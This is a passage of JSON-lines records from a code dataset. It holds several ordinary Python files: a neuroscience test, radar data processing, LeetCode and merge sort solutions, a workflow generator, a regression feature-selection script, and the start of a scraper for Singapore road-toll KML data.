check_recordings_equal(hybrid_spikes_recording, saved_1job, return_scaled=False)\n check_recordings_equal(hybrid_spikes_recording, saved_2job, return_scaled=False)\n\n\ndef test_generate_injected_sorting():\n recording = load_extractor(cache_folder / \"recording\")\n sorting = load_extractor(cache_folder / \"sorting\")\n injected_sorting = generate_injected_sorting(\n sorting, [recording.get_num_frames(seg_index) for seg_index in range(recording.get_num_segments())]\n )\n\n\nif __name__ == \"__main__\":\n setup_module()\n test_generate_injected_sorting()\n test_hybrid_units_recording()\n test_hybrid_spikes_recording()\n","repo_name":"SpikeInterface/spikeinterface","sub_path":"src/spikeinterface/comparison/tests/test_hybrid.py","file_name":"test_hybrid.py","file_ext":"py","file_size_in_byte":4491,"program_lang":"python","lang":"en","doc_type":"code","stars":318,"dataset":"github-code","pt":"53"} +{"seq_id":"11598896612","text":"import os\nfrom pyart.core.transforms import antenna_to_cartesian\nfrom .radarpolar_data import readRadarPolar, radarPolarTimeInfo\n\n\ndef create_qvp_data(dirMDV, source, time, fields, desired_angle, time_zone):\n if source is None:\n dirDate = dirMDV\n else:\n dirDate = os.path.join(dirMDV, source)\n\n radar = readRadarPolar(dirDate, time, fields)\n if radar is None:\n return {}\n\n index = abs(radar.fixed_angle[\"data\"] - desired_angle).argmin()\n radar_range = radar.range[\"data\"] / 1000.0\n radar_angle = radar.fixed_angle[\"data\"][index]\n _, _, height = antenna_to_cartesian(radar_range, 0.0, radar_angle)\n\n data = dict()\n for field in fields:\n data[field] = radar.get_field(index, field).mean(axis=0)\n\n infoT = radarPolarTimeInfo(radar, time_zone)\n\n return {\n \"time\": infoT[\"format\"],\n \"elevation\": radar_angle,\n \"height\": height,\n \"data\": data,\n }\n","repo_name":"rijaf-iri/mtorwaradar","sub_path":"mtorwaradar/api/create_qvp.py","file_name":"create_qvp.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25198366562","text":"class Solution:\n def myAtoi(self, s: str) -> int:\n MAX_VAL, MIN_VAL = 2**31-1, -(2**31)\n res, index = 0, 0\n stripped = s.strip()\n if len(stripped) == 0:\n return 0\n firstChar = stripped[0]\n sign = -1 if firstChar == \"-\" else 1\n if firstChar == \"-\" or firstChar == \"+\":\n index = 1\n while index < len(stripped) and stripped[index].isdigit():\n nextDigit = int(stripped[index])\n if res > MAX_VAL // 10 or (res == MAX_VAL // 10 and nextDigit > 7):\n return MAX_VAL if sign == 1 else MIN_VAL\n res = res * 10 + int(stripped[index])\n index += 1\n return res * sign\n","repo_name":"Reflectrr/leetcode","sub_path":"8.string_to_integer_atoi.py","file_name":"8.string_to_integer_atoi.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2128173260","text":"#!/usr/bin/env python\n\nimport os\nimport pwd\nimport sys\nimport time\nimport file_paths_config as paths\nfrom glob import glob\nfrom Pegasus.DAX3 import *\n\n# The name of the DAX file is the first argument\nif len(sys.argv) != 2:\n sys.stderr.write(\"Usage: %s DAXFILE\\n\" % (sys.argv[0]))\n sys.exit(1)\ndaxfile = sys.argv[1]\n\nUSER = pwd.getpwuid(os.getuid())[0]\n\n# Create a abstract dag\ndax = ADAG(\"process\")\n\n# Add some workflow-level metadata\ndax.metadata(\"creator\", \"%s@%s\" % (USER, os.uname()[1]))\ndax.metadata(\"created\", 
time.ctime())\n\n#path_to_data = paths.file_paths['data'].replace('*','')\npath_list = glob(paths.file_paths['data'])\npath_list_index = paths.file_paths['data'].split('/').index('*')\n\nfor path in sorted(path_list):\n\tplant_folder_name = path.split('/')[path_list_index]\n\tpreprocess = Job(\"zip\")\n\tzip_file_name = plant_folder_name + \".zip\"\n\tpreprocess.addArguments(path, plant_folder_name)\n\tzip_file = File(zip_file_name)\n\tpreprocess.uses(zip_file, link=Link.OUTPUT, transfer=True, register=False)\n\tdax.addJob(preprocess)\n\nf = open(daxfile, \"w\")\ndax.writeXML(f)\nf.close()\n","repo_name":"cseseniordesign/plant-phenotyping","sub_path":"compressDatasetWorkflow/daxgen.py","file_name":"daxgen.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"15034545778","text":"import numpy as np\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.model_selection import cross_val_predict\nfrom sklearn.metrics import mean_squared_error\nimport A2\n\ndef main():\n \"\"\"Main function to run when running the script.\"\"\"\n data = np.loadtxt(\"A2_datasets_2022/GPUbenchmark.csv\", delimiter=\",\")\n X = data[:, :-1]\n y = data[:, -1]\n\n for use_cross in [False, True]:\n print(f\"Cross validation inside the algorithm? {use_cross}\")\n models = A2.forward_selection(X, y, cross_val=use_cross, as_indexes=False)\n lr = LinearRegression()\n cross_mses = []\n for fs in range(1, len(models) + 1):\n m = models[:fs] - 1\n y_pred = cross_val_predict(lr, X[:, m], y, cv=3)\n mse = mean_squared_error(y, y_pred)\n cross_mses.append(mse)\n print(f\"{len(m)} feature(s) model MSE: {mse}\")\n cross_mses = np.array(cross_mses)\n print(f\"Best model: {models[:cross_mses.argmin() + 1]}\")\n print(f\"Most important feature: {models[0]}\")\n print(\"\\n-----------------------------------------\\n\")\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"oenstrom/2DV516_A2","sub_path":"exercise6.py","file_name":"exercise6.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30423285269","text":"from asyncio.windows_events import NULL\r\nfrom numpy import rint\r\nimport pandas as pd\r\nfrom flask.json import dump, load\r\nfrom itertools import chain\r\n\r\n\r\npersona = pd.read_csv(\".\\data.csv\")\r\n\r\n\r\nregistros = pd.read_csv(\"..\\datos_registro.csv\")\r\n\r\n\r\ndef get_data():\r\n return persona\r\n\r\ndef guardar_datos(data):\r\n df = pd.DataFrame(data)\r\n df.to_csv(\".\\datos_registro.csv\",index=False,mode=\"a\",header=False, na_rep=\"\\n\")\r\n\r\ndef get_registro():\r\n return pd.read_csv(\"..\\datos_registro.csv\")\r\n\r\ndef get_ind():\r\n data = get_registro()\r\n indigenas = data[data[\"Etnia\"].str.contains(\"Indigena\")]\r\n return indigenas\r\n\r\ndef get_afro():\r\n data = get_registro()\r\n afroecuatorianos = data[data[\"Etnia\"].str.contains(\"Afroecuatoriano\")]\r\n return afroecuatorianos\r\n\r\ndef get_mez():\r\n data = get_registro()\r\n meztizo = data[data[\"Etnia\"].str.contains(\"Meztizo\")]\r\n return meztizo\r\n\r\ndef get_eur():\r\n data = get_registro()\r\n eurodesendiente =data[data[\"Etnia\"].str.contains(\"EuroDesendiente\")]\r\n return eurodesendiente\r\n\r\nindigena = get_ind()\r\n\r\nnew_df = indigena.groupby(indigena[\"ID\"])\r\nfor group in new_df:\r\n # df = pd.DataFrame(lista, columns=['ID', 'ETNIA','A', 'E','I'])\r\n valor=str(group[1])\r\n valor = \" 
\".join(valor.split())\r\n lista = valor.split(\" \")\r\n lista = lista[5:]\r\n matriz = []\r\n vec = []\r\n for i in range(len(lista)):\r\n if i % 6 == 0:\r\n matriz.append(vec)\r\n vec=[]\r\n vec.append(lista[i])\r\n # vec=[]\r\n # if i > 7:\r\n # if i % 7 == 0:\r\n # matriz.append(vec)\r\n # vec=[]\r\n # vec.append(lista[i])\r\n \r\n if vec != []:\r\n matriz.append(vec)\r\n matriz.pop(0)\r\n print(matriz)\r\n\r\n # # df = list(chain.from_iterable(matriz))\r\n # df = pd.DataFrame(matriz)\r\n # print(df)\r\n # print(df[2].mean())\r\n print(\"######################\")\r\n","repo_name":"rebecau/Figshare","sub_path":"controllers/images.py","file_name":"images.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70734994407","text":"# Write a function called merge_sort that sorts a list of integers using the merge sort algorithm.\n\n\ndef merge(array1, array2):\n combined = []\n i = 0 \n j = 0\n\n while i < len(array1) and j < len(array2):\n if array1[i] < array2[j]:\n combined.append(array1[i])\n i +=1\n else:\n combined.append(array2[j])\n j +=1\n while i < len(array1):\n combined.append(array1[i])\n i +=1\n while j < len(array2):\n combined.append(array2[j])\n j +=1\n\n return combined\n\n\n\ndef merge_sort(my_list):\n # if the list contains only one element, it is already sorted\n if len(my_list) == 1:\n return my_list\n \n # find the midpoint/middle index of the list using integer division by 2\n mid_index = int(len(my_list)/2)\n\n # recursively call the merge_sort function to sort the left and right halves of the list\n left = merge_sort(my_list[:mid_index]) # created by slicing my_list using mid_index\n right = merge_sort(my_list[mid_index:])\n\n # Call the previously implemented merge function to combine the sorted left and right halves into a single sorted list\n # Or merge the sorted left and right halves of the list\n return merge(left, right)\n\n\n\n\n# print(merge([1,2,7,8], [3,4,5,6]))\noriginal_list = [3,1,4,2]\n\nsorted_list = merge_sort(original_list)\n\nprint('Original List:', original_list)\n\nprint('\\nSorted List:', sorted_list)\n\n# Merge Sort is a divide-and-conquer algorithm for sorting a list numbers.","repo_name":"hirak-saharia/DSA_Using_Python","sub_path":"Merge_Sort/Merge_Sort.py","file_name":"Merge_Sort.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71591301609","text":"import logging\nimport requests\nimport re\nimport pandas as pd\nimport datetime\nfrom bs4 import BeautifulSoup\nimport os\nimport glob\n\n# Configure logging settings\nlog_format = \"%(asctime)s [%(levelname)s] - %(message)s\"\nlogging.basicConfig(\n level=logging.INFO, filename=\"data_extraction.log\", filemode=\"a\", format=log_format\n)\n\n# Define file paths and URLs\nkml_path = \"https://onemotoring.lta.gov.sg/mapapp/kml/erp-kml/erp-kml-0.kml\"\nlink = \"https://datamall.lta.gov.sg/mapapp/pages/ddls/1_ddl.html\"\ndata_directory = \"data\" # Directory to store data files\ntoll_pattern = \"toll-rates\"\nmarkers_pattern = \"markers\"\n\ndef extract_plaza_info_from_kml(kml_path):\n \"\"\"\n Extract data from a KML file and perform preprocessing.\n\n Args: \n kml_path (str): URL to the KML file.\n\n Returns:\n pandas.DataFrame: Extracted and processed data.\n \"\"\"\n try:\n logging.info(\"Fetching data from KML file.\")\n response = requests.get(kml_path)\n response.raise_for_status()\n\n 
data = response.text\n name_pattern = r\"([^<]+)